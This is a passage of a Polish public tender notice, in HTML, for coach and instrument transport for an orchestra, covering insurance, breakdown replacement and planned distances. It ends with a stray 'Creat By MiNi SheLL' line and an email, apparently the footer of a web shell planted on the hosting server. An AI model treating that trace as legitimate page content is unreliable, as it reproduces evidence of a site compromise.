- wiedzę na temat przygotowania estrady do występu orkiestry 
- znajomość specyfiki pracy z orkiestrą
-  zakres obowiązków kierowców wchodzi rozładunek i załadunek samochodów 
Przy orkiestrze liczącej powyżej 50 osób konieczność drugiego pracownika/kierowcy.
Suma dodatkowego ubezpieczenia 500,000 EURO szkód w mieniu
W przypadku wyjazdu dłuższego niż 1 dzień wykonawca (tj kierowca, - y) ma zapewniony noclegi oraz posiłki. 
Zamówienie będzie  dokonane nie później niż na  30 dni przed planowanym wyjazdem. 
Wykonawca musi mięć każdorazowo możliwość zapewnienia dwóch takich samych autokarów. W przypadku awarii autokaru, której nie da się usunąć  w przeciągu 3 godzin (w przypadku awarii na terenie Polski) i  przeciągu 8 godzin (w przypadku awarii poza granicami Polski) Wykonawca jest zobowiązany niezwłocznie zapewnić autokar zastępczy o takich samych parametrach. 

Planowana ilość kilometrów:
- w kraju 2 500 
- za granicą 7 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Transport instrumentów i sprzętu na terenie Łodzi i województwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba transportów  - 20  

Samochody wyposażone w:
- akcesoria niezbędne do zabezpieczenia instrumentów w trakcie transportu - tak by instrumenty pozostały nieruchome w trakcie jazdy
 - rampę, lub pomost załadowczy 
Suma dodatkowego ubezpieczenia 500,000 EURO szkód w mieniu
W przypadku wyjazdu dłuższego niż 1 dzień wykonawca (tj kierowca, - y) ma zapewniony noclegi oraz posiłki. 
Zamówienie będzie  dokonane nie później niż na  10 dni przed planowanym wyjazdem. 
W przypadku awarii pojazdu, której nie da się usunąć  w przeciągu 1 godziny (poza obszarem Łodzi) i  w przypadku każdej awarii na terenie Łodzi, Wykonawca jest zobowiązany niezwłocznie zapewnić pojazd zastępczy o takich samych parametrach.

Planowana ilość kilometrów - 300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com